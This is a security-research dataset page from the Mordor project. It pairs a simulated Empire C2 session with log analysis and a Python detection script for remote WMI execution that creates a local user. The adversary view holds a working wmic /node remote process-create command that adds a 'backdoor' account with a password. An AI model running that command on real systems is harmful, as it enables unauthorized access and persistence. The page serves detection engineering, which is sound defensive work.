Empire Remote WMIC Add User¶
Metadata¶
Field | Value
---|---
Author | Roberto Rodriguez @Cyb3rWard0g
Creation Date | 2020/09/14
Modification Date | 2020/09/22
Tactics |
Techniques | ['T1047']
Tags | ['WMI IWbemServices ExecMethod', 'User Backdoor']
Dataset Description¶
This dataset represents an adversary remotely executing code via WMI to add a backdoor user on the target system. It focuses on the use of the WMI Win32_Process class and its Create method (invoked through IWbemServices::ExecMethod) to execute code on a remote host; on the target, the new process is spawned by the WMI provider host, WmiPrvSE.exe.
Datasets Downloads¶
Dataset Type | Link
---|---
Host | https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/empire_wmic_add_user_backdoor.zip
Simulation Plan¶
Environment | Tool Type | Module
---|---|---
Mordor shire | C2 | shell
Adversary View¶
(Empire: agents) >
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent 6Z78CY25 checked in
[+] Initial agent 6Z78CY25 from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to 6Z78CY25 at 172.18.39.5
agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
KFL6CMNZ ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 7584 5/0.0 2020-09-14 11:33:59 http
YGBLW8EM ps 172.18.39.5 WORKSTATION5 *THESHIRE\wardog powershell 8924 5/0.0 2020-09-14 11:40:53 http
UBCKLYFA ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5412 5/0.0 2020-09-14 11:57:16 http
6Z78CY25 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 9564 5/0.0 2020-09-14 12:02:08 http
(Empire: agents) > interact 6Z78CY25
(Empire: 6Z78CY25) >
(Empire: 6Z78CY25) > shell wmic /node:WORKSTATION6 process call create "net user /add backdoor pa$$w0rd1"
[*] Tasked 6Z78CY25 to run TASK_SHELL
[*] Agent 6Z78CY25 tasked with task ID 1
(Empire: 6Z78CY25) >
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 7768;
ReturnValue = 0;
};
..Command execution completed.
(Empire: 6Z78CY25) >
Explore Mordor Dataset¶
Initialize Analytics Engine¶
from openhunt.mordorutils import *
spark = get_spark()
Download & Process Mordor File¶
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/empire_wmic_add_user_backdoor.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable
Get to know your data¶
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname |Channel |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Security |5447 |1430 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |12 |1426 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |10 |1361 |
|WORKSTATION5.theshire.local|Security |5158 |1337 |
|WORKSTATION5.theshire.local|Security |5154 |1297 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |7 |1139 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |13 |1115 |
|WORKSTATION5.theshire.local|Security |4658 |534 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |10 |276 |
|WORKSTATION5.theshire.local|Security |4656 |270 |
|WORKSTATION5.theshire.local|Security |4690 |264 |
|WORKSTATION5.theshire.local|Security |4663 |257 |
|WORKSTATION5.theshire.local|Security |4703 |120 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |7 |113 |
|WORKSTATION5.theshire.local|Windows PowerShell |800 |108 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |11 |95 |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103 |90 |
|WORKSTATION5.theshire.local|Security |5156 |84 |
|WORKSTATION6.theshire.local|Security |4658 |67 |
|MORDORDC.theshire.local |Security |5156 |54 |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows
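The exploration above shows the data from both hosts, but the interesting half of this dataset lives on the target, WORKSTATION6: the `net user /add` launched through Win32_Process.Create runs as a child of WmiPrvSE.exe, and, if the command succeeds, a Security 4720 (user account created) follows seconds later. The following is an added example, not part of the original notebook, that implements that detection in plain Python over a handful of constructed events shaped like the dataset's Sysmon Event ID 1 and Security 4720 records (column names follow the Mordor/Sysmon fields, Hostname, Channel, EventID, Image, ParentImage, CommandLine and TargetUserName; the hosts, times and account name are made up). The embedded SparkSQL string is the equivalent query for the notebook's `mordorTable` view and assumes those same column names.

```python
"""Detect remote WMI Win32_Process.Create execution that adds a local user.

Added example, not part of the original Mordor notebook. Events below are
constructed to look like Sysmon Event ID 1 (process creation) and Security
Event ID 4720 (user account created) records; nothing here is dataset output.
"""
import re
from datetime import datetime, timedelta

SYSMON = "Microsoft-Windows-Sysmon/Operational"
NET_BINARIES = {"net.exe", "net1.exe"}
# Both "net user /add <name> <pw>" and "net user <name> <pw> /add" create an account.
ADD_USER_RE = re.compile(r"\buser\b.*?/add\b", re.IGNORECASE)

# Equivalent SparkSQL for the notebook's mordorTable view (assumes the standard
# Mordor column names used in this example).
SPARK_SQL = """
SELECT `@timestamp`, Hostname, ParentImage, Image, CommandLine
FROM mordorTable
WHERE Channel = 'Microsoft-Windows-Sysmon/Operational'
  AND EventID = 1
  AND LOWER(ParentImage) LIKE '%wmiprvse.exe'
  AND (LOWER(Image) LIKE '%net.exe' OR LOWER(Image) LIKE '%net1.exe')
  AND LOWER(CommandLine) RLIKE 'user.*/add'
"""

# Constructed sample events (not from the dataset).
SAMPLE_EVENTS = [
    # Interactive admin running net from cmd.exe: not WMI-spawned, ignored.
    {"@timestamp": "2020-09-14T12:01:10", "Hostname": "WORKSTATION5.theshire.local",
     "Channel": SYSMON, "EventID": 1, "Image": r"C:\Windows\System32\net.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "net localgroup administrators"},
    # Win32_Process.Create on the target: the provider host WmiPrvSE.exe is the parent.
    {"@timestamp": "2020-09-14T12:03:02", "Hostname": "WORKSTATION6.theshire.local",
     "Channel": SYSMON, "EventID": 1, "Image": r"C:\Windows\System32\net.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "net user /add backdoor pa$$w0rd1"},
    # net.exe hands off to net1.exe; its parent is net.exe, so it is not counted twice.
    {"@timestamp": "2020-09-14T12:03:02", "Hostname": "WORKSTATION6.theshire.local",
     "Channel": SYSMON, "EventID": 1, "Image": r"C:\Windows\System32\net1.exe",
     "ParentImage": r"C:\Windows\System32\net.exe",
     "CommandLine": r"C:\Windows\system32\net1 user /add backdoor pa$$w0rd1"},
    # Security 4720 on the target confirms the account was actually created.
    {"@timestamp": "2020-09-14T12:03:03", "Hostname": "WORKSTATION6.theshire.local",
     "Channel": "Security", "EventID": 4720,
     "TargetUserName": "backdoor", "SubjectUserName": "pgustavo"},
    # Another WMI-spawned process with no account change: lower-severity hit.
    {"@timestamp": "2020-09-14T12:10:40", "Hostname": "WORKSTATION6.theshire.local",
     "Channel": SYSMON, "EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "cmd.exe /c whoami"},
]


def _basename(path):
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return 'wmi_add_user', 'wmi_child_process' or None for a single event."""
    if event.get("Channel") != SYSMON or event.get("EventID") != 1:
        return None
    if _basename(event.get("ParentImage", "")) != "wmiprvse.exe":
        return None
    if (_basename(event.get("Image", "")) in NET_BINARIES
            and ADD_USER_RE.search(event.get("CommandLine", ""))):
        return "wmi_add_user"
    return "wmi_child_process"


def find_wmi_execution(events, window=timedelta(seconds=60)):
    """Flag WmiPrvSE.exe children and tie account-add hits to a 4720 on the same host.

    Returns one alert dict per flagged process, in input order. For
    'wmi_add_user' hits, created_user holds the TargetUserName of a 4720
    that fired on the same host within `window` after the process start,
    or None if no such event was seen."""
    created = [(e["Hostname"], datetime.fromisoformat(e["@timestamp"]), e.get("TargetUserName"))
               for e in events if e.get("Channel") == "Security" and e.get("EventID") == 4720]
    alerts = []
    for e in events:
        kind = classify(e)
        if kind is None:
            continue
        started = datetime.fromisoformat(e["@timestamp"])
        alert = {"kind": kind, "host": e["Hostname"], "image": _basename(e["Image"]),
                 "command_line": e.get("CommandLine", ""), "created_user": None}
        if kind == "wmi_add_user":
            for host, when, user in created:
                if host == e["Hostname"] and started <= when <= started + window:
                    alert["created_user"] = user
                    break
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in find_wmi_execution(SAMPLE_EVENTS):
        print(alert)
```

The two tiers matter in practice: WmiPrvSE.exe also spawns processes for legitimate management tooling, so `wmi_child_process` hits need a baseline before they are alertable, whereas a WMI-spawned `net user /add` followed by a 4720 on the same host is high-fidelity on its own. Note also that the source side of this dataset leaves its own trace: on WORKSTATION5 the Empire agent runs wmic.exe with `/node:WORKSTATION6 process call create` in its command line, which is worth a separate analytic on the originating host. Where Sysmon is absent, Security 4688 with command-line auditing enabled carries the same parent/child and command-line fields.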